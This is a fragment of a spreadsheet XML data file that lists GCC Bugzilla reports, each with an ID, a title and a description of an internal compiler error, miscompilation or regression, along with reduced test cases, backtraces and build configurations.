it briefly in the target macros section but it's just a brief mention and doesn't say what that pragma is 
supposed to do.</t>
  </si>
  <si>
    <t>GCC-23989</t>
  </si>
  <si>
    <t>[4.1 Regression] DCE removes a loop when it shouldn't</t>
  </si>
  <si>
    <t>DCE (.t44.dce3) eliminates the third loop in the testcase below although the 
print loop should be enough to keep it alive:
======================
subroutine foo(ab)
real ab
type bzz
   real d(100)
end type bzz
type (bzz) e
dimension a(100) b(100)
read *xy
a=log(x)    &lt;--- loop 1
b=log(y)    &lt;--- loop 2
e%d = a+b   &lt;--- loop 3. eliminated
print *e%d
end
======================
See related thread here: http://gcc.gnu.org/ml/gcc/2005-09/msg00645.html</t>
  </si>
  <si>
    <t>GCC-48053</t>
  </si>
  <si>
    <t>ICE in in build_int_cst_wide when building cpu2000 galgel/equake/ammp/fma3d/sixtrack</t>
  </si>
  <si>
    <t>Created attachment 23609
reduced testcase
The following ICE just showed up on my nightly spec runs.
$ /home/pthaugen/install/gcc/trunk_debug/bin/gcc -c -m64 -O3 -mcpu=power7 -funroll-loops quake.c 
quake.c: In function â€˜mainâ€™:
quake.c:24:1: internal compiler error: in build_int_cst_wide at tree.c:1226
$ /home/pthaugen/install/gcc/trunk_debug/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/home/pthaugen/install/gcc/trunk_debug/bin/gcc
COLLECT_LTO_WRAPPER=/home/pthaugen/install/gcc/trunk_debug/libexec/gcc/powerpc64-linux/4.6.0/lto-wrapper
Target: powerpc64-linux
Configured with: /home/pthaugen/src/gcc/trunk/gcc/configure --prefix=/home/pthaugen/install/gcc/trunk_debug --target=powerpc64-linux --host=powerpc64-linux --build=powerpc64-linux --enable-secureplt --enable-threads=posix --enable-shared --enable-__cxa_atexit --with-long-double-128 --enable-decimal-float --disable-alsa --enable-checking --with-as=/opt/gcc-nightly/binutils-2.20/bin/as --with-ld=/opt/gcc-nightly/binutils-2.20/bin/ld --with-lto --with-libelf=/opt/gcc-nightly/gcc-host-libs --with-gmp=/opt/gcc-nightly/gcc-host-libs --with-mpfr=/opt/gcc-nightly/gcc-host-libs --with-mpc=/opt/gcc-nightly/gcc-host-libs --enable-languages=c --disable-bootstrap
Thread model: posix
gcc version 4.6.0 20110309 (experimental) [trunk revision 170818] (GCC) 
Breakpoint 1 build_int_cst_wide (type=0xfffb0f011b8 low=18446744073709551615 hi=-1)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/tree.c:1226
1226          gcc_unreachable ()
(gdb) prt type
 &lt;real_type 0xfffb0f011b8 double sizes-gimplified DF
    size  constant 64&gt;
    unit size  constant 8&gt;
    align 64 symtab 0 alias set 2 canonical type 0xfffb0f011b8 precision 64
    pointer_to_this &gt;
(gdb) p /x low
$2 = 0xffffffffffffffff
(gdb) p /x hi
$3 = 0xffffffffffffffff
(gdb) p TREE_CODE(type)
$4 = REAL_TYPE
(gdb) bt
#0  build_int_cst_wide (type=0xfffb0f011b8 low=18446744073709551615 hi=-1)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/tree.c:1226
#1  0x00000000103c4120 in make_tree (type=0xfffb0f011b8 x=0xfffb0e70460)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/expmed.c:4960
#2  0x00000000103c4268 in make_tree (type=0xfffb10ceb98 x=0xfffb0e79430)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/expmed.c:4991
#3  0x0000000010bc5d7c in force_const_mem (mode=V2DFmode x=0xfffb0e79430)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/varasm.c:3543
#4  0x00000000103d7230 in emit_move_insn (x=0xfffb0edba40 y=0xfffb0e79430)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/expr.c:3368
#5  0x0000000010bea40c in rs6000_expand_vector_init (target=0xfffb0edba40 vals=0xfffb0e79420)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/config/rs6000/rs6000.c:5299
#6  0x0000000010e20898 in gen_vec_initv4si (operand0=0xfffb0edba40 operand1=0xfffb0e79420)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/config/rs6000/vector.md:658
#7  0x0000000010e2630c in gen_split_2212 (curr_insn=0xfffb10097e0 operands=0x1160a8b8)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/config/rs6000/altivec.md:246
#8  0x0000000010f3e460 in split_14 (x0=0xfffb0e99930 insn=0xfffb10097e0)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/config/rs6000/altivec.md:229
#9  0x0000000010f404f0 in split_insns (x0=0xfffb0e99930 insn=0xfffb10097e0)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/config/rs6000/dfp.md:480
#10 0x000000001038c980 in try_split (pat=0xfffb0e99930 trial=0xfffb10097e0 last=1)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/emit-rtl.c:3415
#11 0x00000000106dcf9c in split_insn (insn=0xfffb10097e0)
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/recog.c:2781
#12 0x00000000106dd5bc in split_all_insns ()
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/recog.c:2870
#13 0x00000000106e0700 in rest_of_handle_split_before_sched2 ()
    at /home/pthaugen/src/gcc/trunk/gcc/gcc/recog.c:3811
...</t>
  </si>
  <si>
    <t>GCC-60992</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE in tsubst_copy at cp/pt.c:12637</t>
  </si>
  <si>
    <t>Google ref: b/14350545
Test:
/// --- cut ---
struct ScopeGuardGenerator { }
struct FF
{
  template 
  void
  operator () (F &amp; ...)
  {
    const int n = sizeof ... (Ts)
    void *mutexes[n]
    auto _on_scope_exit_var_0 =
      ScopeGuardGenerator () + [
  }
}
template 
int operator+ (ScopeGuardGenerator F) { return 1 }
struct D
{
  template 
  void
  operator () (T0 T1 const T2 &amp; t2 T &amp; ... t)
  {
    base (t2 t ...)
  }
  FF base
}
D run_with_locks
void Fn ()
{
  run_with_locks ([] { } 0 0)
}
/// ---cut---
Using current trunk (r209848):
g++ -c -std=c++11 t2.ii
t2.ii: In instantiation of â€˜FF::operator()(F Ts = {}]â€™:
t2.ii:12:34:   required from â€˜struct FF::operator()(F Ts = {}]::â€™
t2.ii:12:30:   required from â€˜void FF::operator()(F Ts = {}]â€™
t2.ii:25:5:   required from â€˜void D::operator()(T0 T1 const T2 T1 = int T2 = int T = {}]â€™
t2.ii:34:31:   required from here
t2.ii:12:43: internal compiler error: in tsubst_copy at cp/pt.c:12637
       ScopeGuardGenerator () + [
                                           ^
0x5d35cd tsubst_copy
	../../gcc/cp/pt.c:12637
0x5af80b tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:15150
0x5ba6f6 tsubst_expr
	../../gcc/cp/pt.c:13979
0x5c4097 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:11596
0x5c33f5 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:12045
0x5c2c4b tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:11561
0x5d55a0 tsubst_decl
	../../gcc/cp/pt.c:11043
0x5c388f tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:11492
0x5bb12c tsubst_expr
	../../gcc/cp/pt.c:13438
0x5bb249 tsubst_expr
	../../gcc/cp/pt.c:13586
0x5b8399 instantiate_decl(tree_node* int bool)
	../../gcc/cp/pt.c:19875
0x5f4147 instantiate_class_template_1
	../../gcc/cp/pt.c:9334
0x5f4147 instantiate_class_template(tree_node*)
	../../gcc/cp/pt.c:9402
0x6879f3 complete_type(tree_node*)
	../../gcc/cp/typeck.c:134
0x5afa30 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:15247
0x5b19bb tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:14362
0x5ba6f6 tsubst_expr
	../../gcc/cp/pt.c:13979
0x5bd579 tsubst_expr
	../../gcc/cp/pt.c:13489
0x5ba0a3 tsubst_expr
	../../gcc/cp/pt.c:13381
0x5bb249 tsubst_expr
	../../gcc/cp/pt.c:13586
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
The test compiles cleanly with Clang and gcc-4.8 (at least the version I have).</t>
  </si>
  <si>
    <t>GCC-2602</t>
  </si>
  <si>
    <t>gcc core dumps when compiling /usr/include/linux/coda.h</t>
  </si>
  <si>
    <t>gcc -DMODULE -D__KERNEL__ -c t.c
t.c:
#include 
#include 
#include 
/* With linux linked from the include/linux directory from
 * the linux-2.2.16.tar.gz distribution from ftp.kernel.org
 */
Release:
2.96 20000731
Environment:
Red Hat Linux 7.0:
Linux leepc.nc.bustech.com 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown</t>
  </si>
  <si>
    <t>lee_merrill</t>
  </si>
  <si>
    <t>GCC-60175</t>
  </si>
  <si>
    <t>ICE on gcc.dg/asan/nosanitize-and-inline.c</t>
  </si>
  <si>
    <t>/home/ed/gnu/gcc-4.9-20140209/gcc/testsuite/gcc.dg/asan/nosanitize-and-inline.c: In function 'main':^M
/home/ed/gnu/gcc-4.9-20140209/gcc/testsuite/gcc.dg/asan/nosanitize-and-inline.c:57:1: internal compiler error: in check_probability at basic-block.h:950^M
0xc561f check_probability^M
        ../../gcc-4.9-20140209/gcc/basic-block.h:950^M
0x23aaab check_probability^M
        ../../gcc-4.9-20140209/gcc/cfgloopmanip.c:1332^M
0x23aaab combine_probabilities^M
        ../../gcc-4.9-20140209/gcc/basic-block.h:959^M
0x23aaab duplicate_loop_to_header_edge(loop* edge_def* unsigned int simple_bitmap_def* edge_def* vec* int)^M
        ../../gcc-4.9-20140209/gcc/cfgloopmanip.c:1264^M
0x473d8f peel_loop_completely^M
        ../../gcc-4.9-20140209/gcc/loop-unroll.c:609^M
0x473d8f peel_loops_completely^M
        ../../gcc-4.9-20140209/gcc/loop-unroll.c:370^M
0x473d8f unroll_and_peel_loops(int)^M
        ../../gcc-4.9-20140209/gcc/loop-unroll.c:275^M
0x465e33 rtl_unroll_and_peel_loops^M
        ../../gcc-4.9-20140209/gcc/loop-init.c:598^M
0x465e33 execute^M
        ../../gcc-4.9-20140209/gcc/loop-init.c:629^M
Please submit a full bug report^M
with preprocessed source if appropriate.^M
Please include the complete backtrace with any bug report.^M
See  for instructions.^M
cat LAST_UPDATED 
Obtained from SVN: trunk revision 207646</t>
  </si>
  <si>
    <t>GCC-23563</t>
  </si>
  <si>
    <t>[4.0 Regression] False warning for uninitialized variable</t>
  </si>
  <si>
    <t>When I compile warn-thing.cpp (to be attached as soon as I've submitted this
bug) with gcc 4.0.2 I get the warning message
warn-thing.cpp:24: warning: 'variable' may be used uninitialized in this function
This warning appears to me to be incorrect and did not occur with gcc 3.4.2.
The warning does not occur if optimization is not enabled.
The attached error output is from gcc version 4.0.2 20050728 (prerelease)
[FreeBSD] for i386-portbld-freebsd5.4 but I see the same results with gcc
version 4.0.2 20050806 (prerelease) (Debian 4.0.1-4) for i486-linux-gnu.
$ gcc40 -v -Wall -O2 -c warn-thing.cpp
Using built-in specs.
Target: i386-portbld-freebsd5.4
Configured with: ./..//gcc-4.0-20050728/configure --disable-nls
--with-system-zlib --with-libiconv-prefix=/usr/local --program-suffix=40
--libdir=/usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2
--with-gxx-include-dir=/usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/include/c++/
--with-gmp=/usr/local --disable-shared --prefix=/usr/local i386-portbld-freebsd5.4
Thread model: posix
gcc version 4.0.2 20050728 (prerelease) [FreeBSD]
 /usr/local/libexec/gcc/i386-portbld-freebsd5.4/4.0.2/cc1plus -quiet -v
warn-thing.cpp -quiet -dumpbase warn-thing.cpp -auxbase warn-thing -O2 -Wall
-version -o /var/tmp//ccjEgsIS.s
ignoring nonexistent directory
/usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/gcc/i386-portbld-freebsd5.4/4.0.2/../../../../i386-portbld-freebsd5.4/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/include/c++/
 /usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/include/c++//i386-portbld-freebsd5.4
 /usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/include/c++//backward
 /usr/local/include
 /usr/local/lib/gcc/i386-portbld-freebsd5.4/4.0.2/gcc/i386-portbld-freebsd5.4/4.0.2/include
 /usr/include
End of search list.
GNU C++ version 4.0.2 20050728 (prerelease) [FreeBSD] (i386-portbld-freebsd5.4)
        compiled by GNU C version 4.0.2 20050728 (prerelease) [FreeBSD].
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129460
warn-thing.cpp: In function 'void foo()':
warn-thing.cpp:24: warning: 'variable' may be used uninitialized in this function
 as -o warn-thing.o /var/tmp//ccjEgsIS.s
For comparison here is the non-warning output of gcc 3.4:
$ gcc -v -Wall -O2 -c warn-thing.cpp
Using built-in specs.
Configured with: FreeBSD/i386 system compiler
Thread model: posix
gcc version 3.4.2 [FreeBSD] 20040728
 /usr/libexec/cc1plus -quiet -v -D_LONGLONG warn-thing.cpp -quiet -dumpbase
warn-thing.cpp -auxbase warn-thing -O2 -Wall -version -o /var/tmp//ccHHC2rw.s
ignoring duplicate directory /usr/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.4
 /usr/include/c++/3.4/backward
 /usr/include
End of search list.
GNU C++ version 3.4.2 [FreeBSD] 20040728 (i386-fbsdproj-freebsd)
        compiled by GNU C version 3.4.2 [FreeBSD] 20040728.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 /usr/bin/as -v -o warn-thing.o /var/tmp//ccHHC2rw.s
GNU assembler version 2.15 [FreeBSD] 2004-05-23 (i386-obrien-freebsd) using BFD
version 2.15 [FreeBSD] 2004-05-23</t>
  </si>
  <si>
    <t>GCC-3403</t>
  </si>
  <si>
    <t>[m68k-coff-gcc]Internal compiler error in update_equiv_regs</t>
  </si>
  <si>
    <t>When compiling code that compiled flawlessly under gcc-2.95.2 I
get the following error message:
tpu_sclk.c: In function `TPU_CalcSCLKPrescale':
tpu_sclk.c:85: Internal compiler error in update_equiv_regs at local-alloc.c:1097
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0
Environment:
System: Linux animal 2.2.13 #2 Thu Oct 28 17:18:12 CEST 1999 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: m68k-unknown-coff
configured with: ../gcc-3.0/configure --target=m68k-coff --prefix=/NET/animal/user/doenges/local --with-gnu-as --with-gnu-ld --with-newlib --with-headers=../newlib-1.9.0/newlib/libc/include --enable-languages=c++ : (reconfigured) ../gcc-3.0/configure --target=m68k-coff --prefix=/NET/animal/user/doenges/local --with-gnu-as --with-as=/usr/local/m68k-coff/bin/as --with-gnu-ld --with-ld=/usr/local/m68k-coff/bin/ld --with-newlib --with-headers=../newlib-1.9.0/newlib/libc/include --enable-languages=c++
How-To-Repeat:
The command line that triggered the bug:
m68k-coff-gcc -c -mcpu32 -I../tools -I/home/doenges/mps -O3 -Wall \
-fno-builtin -gcoff -Wno-multichar -DDEBUG tpu_sclk.c
And the preproccessed source (tpu_sclk.i):</t>
  </si>
  <si>
    <t>eric.doenges</t>
  </si>
  <si>
    <t>GCC-16965</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Confusing mismatch in error messages</t>
  </si>
  <si>
    <t>Consider this little example derived from PR 16963: 
------------- 
template  struct B { 
    static int Bar(T) 
} 
struct D : B B {} 
int i1 = D().Bar(1) 
int i2 = D::Bar(2) 
------------- 
Note that Bar() is static so trying to call it via D().Bar or D::Bar 
shouldn't make a difference (for a moment ignore the fact that the 
code doesn't compile at all probably for a good reason as discussed 
in PR 16963). However we get this confusing mismatch in error messages: 
g/x&gt; /home/bangerth/bin/gcc-3.5-pre/bin/c++ -c x.cc 
x.cc:6: error: request for member `Bar' is ambiguous 
x.cc:2: error: candidates are: static int B::Bar(T) [with T = char] 
x.cc:2: error:                 static int B::Bar(T) [with T = int] 
x.cc:7: error: `Bar' is not a member of `D' 
The error message in line 7 is clearly not helpful and wrong above 
that. It should simply read the same as the ambiguity message in line 6. 
This is a regression in 3.4 and mainline over previous versions that 
simply printed as expected: 
g/x&gt; /home/bangerth/bin/gcc-3.3*/bin/c++ -c x.cc 
x.cc:6: error: request for member `Bar' is ambiguous 
x.cc:2: error: candidates are: static int B::Bar(T) [with T = char] 
x.cc:2: error:                 static int B::Bar(T) [with T = int] 
x.cc:7: error: request for member `Bar' is ambiguous 
x.cc:2: error: candidates are: static int B::Bar(T) [with T = char] 
x.cc:2: error:                 static int B::Bar(T) [with T = int] 
W.</t>
  </si>
  <si>
    <t>GCC-33721</t>
  </si>
  <si>
    <t>[meta-bug] Gcc can't properly align stack variable</t>
  </si>
  <si>
    <t>Gcc has STACK_BOUNDARY and PREFERRED_STACK_BOUNDARY. When a stack variable
alignment is greater than PREFERRED_STACK_BOUNDARY gcc will either crash
or generate codes which won't satisfy alignment requirement for stack
variable.</t>
  </si>
  <si>
    <t>GCC-67074</t>
  </si>
  <si>
    <t>Name lookup ambiguity between namespace and its alias</t>
  </si>
  <si>
    <t>Test case:
  namespace P{ namespace X { static int i = 1 } }
  namespace Q { namespace X = P::X }
  using namespace P
  using namespace Q
  int main() { X::i }
Command line:
  g++ prog.cc -std=c++14 -pedantic-errors
This results in name-lookup ambiguity errors when looking up X in main. This is not a name-lookup ambiguity since the two names founds denotes the same entity.
I tried this with gcc HEAD 6.0.0 20150730 here:
  http://melpon.org/wandbox/permlink/6IBZhBmgDMkq6Eho</t>
  </si>
  <si>
    <t>anders.granlund.0</t>
  </si>
  <si>
    <t>GCC-80538</t>
  </si>
  <si>
    <t>Probably unwanted thread yield for thread::sleep_for with &lt; 1s</t>
  </si>
  <si>
    <t>libstdc++-v3 configured to NOT have _GLIBCXX_USE_NANOSLEEP but to HAVE _GLIBCXX_HAVE_SLEEP and _GLIBCXX_HAVE_USLEEP defined causes the execution of the following code:
    ::sleep(__s.count())
    if (__ns.count() &gt; 0)
      {
        long __us = __ns.count() / 1000
        if (__us == 0)
          __us = 1
        ::usleep(__us)
      }
Which means that for values of __s.count() == 0 the current thread will always yield (according to my understanding sleep(0) yields) just before the thread may actually fall asleep for some microseconds. Is this really the desired behaviour?
Anyway what's the desired effect of a thread::sleep_for(0.0)? should the thread yield then? If not then the code should look like this:
    if (__s.count() &gt; 0) ::sleep(__s.count())
    if (__ns.count() &gt; 0)
      {
        long __us = __ns.count() / 1000
        if (__us == 0)
          __us = 1
        ::usleep(__us)
      }
shouldn't it?</t>
  </si>
  <si>
    <t>GCC-30980</t>
  </si>
  <si>
    <t>[4.3 Regression] Recent complex miscompilation</t>
  </si>
  <si>
    <t>Recently (~10 days ago) 26_numerics/complex/13450.cc started failing for *many* targets among which powerpc-darwin. On the latter I'm seeing a miscompilation at -O1 and above of this reduced C++ snippet:
#include 
#include 
int main()
{
  __complex__ double x
  __real__ x = -1.0
  __imag__ x = 0.0
  __complex__ double t = __builtin_clog(x)
  double tmp = 0.5 * (__imag__ t)
  printf(%g %g\n cos(tmp) sin(tmp))
}
/////////////////
Note how the output changes at -O1 and above. Also note that the very same snippet as C is fine thus I'm categorizing as C++ not as middle-end or something else.</t>
  </si>
  <si>
    <t>GCC-8799</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] ICE: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>g++ -c ice.ii ICEs with the error message:
ice.ii:2: type specifier omitted for parameter `
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
at the followig illegal codeline:
struct { a(void = 0 a(0) a(0)
Release:
3.2.2 20021202 (prerelease) and 3.3 20021202 (experimental)
Environment:
This bug is independent of system and configuration.
How-To-Repeat:
See description.</t>
  </si>
  <si>
    <t>GCC-46220</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 Regression] Error: invalid covariant return type generated for incomplete class type and different qualifer</t>
  </si>
  <si>
    <t>g++ fails to compile the following test case:
class Baz
class Foo {
public:
    virtual const Baz* getBaz() = 0
}
class Bar : public Foo {
public:
    Baz* getBaz()
}
test-covar.cc:8: error: invalid covariant return type for â€˜virtual Baz* Bar::getBaz()â€™
test-covar.cc:4: error:   overriding â€˜virtual const Baz* Foo::getBaz()â€™
However it compiles successfully if Baz is complete:
class Baz { }
class Foo {
public:
    virtual const Baz* getBaz() = 0
}
class Bar : public Foo {
public:
    Baz* getBaz()
}
Reproducible on x86_64-redhat-linux (4.1.2 and 4.4.0) and
i386-pc-solaris2.11 (4.2.4 4.3.4 and 4.5.1). Works correctly with g++ 3.4.3</t>
  </si>
  <si>
    <t>nathan.keynes</t>
  </si>
  <si>
    <t>GCC-69535</t>
  </si>
  <si>
    <t>[6 Regression] wrong code with -O -fno-tree-bit-ccp -fno-tree-reassoc due to use of uninitialised value</t>
  </si>
  <si>
    <t>Output:
$ gcc -v                                               
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-232888-checking-yes-rtl-df-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-232888-checking-yes-rtl-df-nographite
Thread model: posix
gcc version 6.0.0 20160127 (experimental) (GCC) 
$ gcc -O -fno-tree-bit-ccp -fno-tree-reassoc testcase.c
$ ./a.out 
00000000000000006161616100000001
Aborted
The 61616161 bytes are used unitialiased in foo() (aaaa from dirtify_stack()).
$ valgrind --track-origins=yes ./a.out
...
==21394== Conditional jump or move depends on uninitialised value(s)
==21394==    at 0x4E7E0B9: vfprintf (in /lib64/libc-2.21.so)
==21394==    by 0x4E85000: printf (in /lib64/libc-2.21.so)
==21394==    by 0x400645: main
==21394==  Uninitialised value was created by a stack allocation
==21394==    at 0x4005BF: foo
...
The assembly shows: (intel syntax)
...
foo:
...
	mov	eax DWORD PTR [rsp+32]	# u32_2 u32_2
	mov	DWORD PTR [rsp] eax	# %sfp u32_2
...
	mov	rsi QWORD PTR [rsp]	# u32_2 %sfp
	mov	edi 0	# u32_2
	add	rax rsi	# tmp115 u32_2
	adc	rdx rdi	# u32_2
...
rsi is loaded by a 64bit value that was stored as a 32bit value.
Tested revisions:
trunk r232888 - FAIL
trunk r232819 - FAIL
5-branch r232808 - OK
4_[6789]-branch - OK</t>
  </si>
  <si>
    <t>GCC-61772</t>
  </si>
  <si>
    <t>RTL if-conversion removes asm volatile goto</t>
  </si>
  <si>
    <t>This is reduced from a bug our kernel people hit.  The problem is
the use of asm volatile gotos inside a conditional when the outgoing
blocks of the asm-goto are itself both empty.  Ala:
------------------------- snip ---------------------------------------
/* { dg-do compile } */
/* { dg-final { scan-assembler-times XXX 2 } } */
static inline __attribute__((always_inline)) int dec_and_test (int *i)
{
    asm volatile goto (XXX %0 %l[cc_label]
                       : : m (*i) : memory : cc_label)
    return 0
cc_label:
    return 1
}
extern int getit (int *)
int f (int *i int cond)
{
  if (cond) {
      getit (0)
      if (dec_and_test (i))
        getit (i)
      return 42
  }
  if (dec_and_test (i))
    (void)1
  return getit (i)
}
------------------ snap ----------------------------------------------
This should have two XXX in the resulting assembler but will have only
one with any optimization level.  It's the RTL if conversion that removes
the seemingly empty second dec_and_test() because the then-block is
empty and because it doesn't check that the removed jump really is only
a jump without side effects.
I don't know if it's a regression (it probably isn't as I don't see that ifcvt.c
was touched with the introduction of asm gotos) but it at least affects
trunk and 4.8.</t>
  </si>
  <si>
    <t>GCC-80864</t>
  </si>
  <si>
    <t>[7 Regression] Brace-initialization of a constexpr variable of an array in a POD triggers ICE from templates</t>
  </si>
  <si>
    <t>The following code triggers an ICE in GCC 6.3.0 and 6.3.1 under independent systems:
``````````````````````````````````````````````````````````````````````````
struct array {
	char c[1]
}
template 
void gun() {
	constexpr auto c = array{{}}
}
void fun() {
	gun()
}
``````````````````````````````````````````````````````````````````````````
`g++ test.cpp`:
``````````````````````````````````````````````````````````````````````````
test.cpp: In instantiation of â€˜void gun() [with T = int]â€™:
test.cpp:13:11:   required from here
test.cpp:8:29: internal compiler error: in reshape_init_r at cp/decl.c:5898
  constexpr auto c = array{{}}
                             ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
``````````````````````````````````````````````````````````````````````````
I didn't find a bug-report with this exact problem but this one could possibly be related:
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=79607</t>
  </si>
  <si>
    <t>GCC-7162</t>
  </si>
  <si>
    <t>Miscellaneous ISO features in gengtype.c</t>
  </si>
  <si>
    <t>cc -c -DIN_GCC    -g    -DHAVE_CONFIG_H -DGENERATOR_FILE    -I. -I. -I../../gcc/
gcc -I../../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include \
  ../../gcc/gcc/gengtype.c -o gengtype.o
(Bundled) cc: warning 480: The -g option is available only with the C/ANSI C pro
duct ignored.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 591: error 1588: o undefined.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 591: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 591: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 591: error 1563: Expression in if
 must be scalar.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 593: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 593: error 1600: Type clash on in
itialization.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 598: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 596: error 1565: Expression in do
 must be scalar.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 599: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 599: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 599: error 1549: Modifiable lvalu
e required for assignment operator.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 600: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 600: error 1549: Modifiable lvalu
e required for assignment operator.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 602: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 602: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 603: error 1532: Reference throug
h a non-pointer.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 603: error 1549: Modifiable lvalu
e required for assignment operator.
(Bundled) cc: ../../gcc/gcc/gengtype.c line 610: error 1705: Function prototy
pes are an ANSI feature.
Release:
gcc 3.2 20020629 experimental
Environment:
hppa2.0w-hp-hpux11.11</t>
  </si>
  <si>
    <t>GCC-79631</t>
  </si>
  <si>
    <t>[CHKP] ICE tree check: expected integer_cst have negate_expr in decompose at tree.h:5255</t>
  </si>
  <si>
    <t>Version 5/6/7 (on x86_64 GNU/Linux) at -Os|1|2|3
and file ./gcc.dg/torture/pr71901.c
$ gcc-7-20170219 -O2 -mmpx -fcheck-pointer-bounds -c pr71901.c
pr71901.c: In function 'fn1.chkp':
pr71901.c:5:6: internal compiler error: tree check: expected integer_cst have negate_expr in decompose at tree.h:5255
 void fn1()
      ^~~
0xea199c tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/tree.c:9815
0x5e6764 tree_check(tree_node const* char const* int char const* tree_code)
        ../../gcc/tree.h:3320
0x5e6764 wi::int_traits::decompose(long* unsigned int tree_node const*)
        ../../gcc/tree.h:5255
0xea6fa4 wi::int_traits::decompose(long* unsigned int tree_node const*)
        ../../gcc/tree.h:3267
0xea6fa4 wide_int_ref_storage::wide_int_ref_storage(tree_node const* const&amp; unsigned int)
        ../../gcc/wide-int.h:976
0xea6fa4 generic_wide_int &gt;::generic_wide_int(tree_node const* const&amp; unsigned int)
        ../../gcc/wide-int.h:753
0xea6fa4 unsigned long wi::extract_uhwi(tree_node const* const&amp; unsigned int unsigned int)
        ../../gcc/wide-int.h:3054
0xea6fa4 tree_int_cst_sign_bit(tree_node const*)
        ../../gcc/tree.c:7355
0xcbada2 chkp_is_constant_addr
        ../../gcc/tree-chkp-opt.c:244
0xcbd81a chkp_get_check_result
        ../../gcc/tree-chkp-opt.c:656
0xcbf4d5 chkp_remove_check_if_pass
        ../../gcc/tree-chkp-opt.c:699
0xcbf4d5 chkp_remove_constant_checks
        ../../gcc/tree-chkp-opt.c:829
0xcbf4d5 chkp_opt_execute
        ../../gcc/tree-chkp-opt.c:1288
0xcbf4d5 execute
        ../../gcc/tree-chkp-opt.c:1344</t>
  </si>
  <si>
    <t>GCC-61915</t>
  </si>
  <si>
    <t>[AArch64] High amounts of GP to FP register moves using LRA on AArch64 - Improve Generic register_move_cost and memory_move_cost</t>
  </si>
  <si>
    <t>The issue that I observed in code size due to the default use of the LRA results in the spilling of the FP register used to spill variables into which increases code-size.
For example in Dhrystone out of dhry_1.c I see sequences like this:
  ldr	d9 [sp 144]
  ...
  fmov	x0 d9
  bl	printf
  ...
  fmov	x0 d9
  ...
  bl	printf
By disabling the LRA the code is a tad leaner (2%):
  ldr	x0 [sp 144]
  ...
  bl	printf
  ...
  ldr	x0 [sp 144]
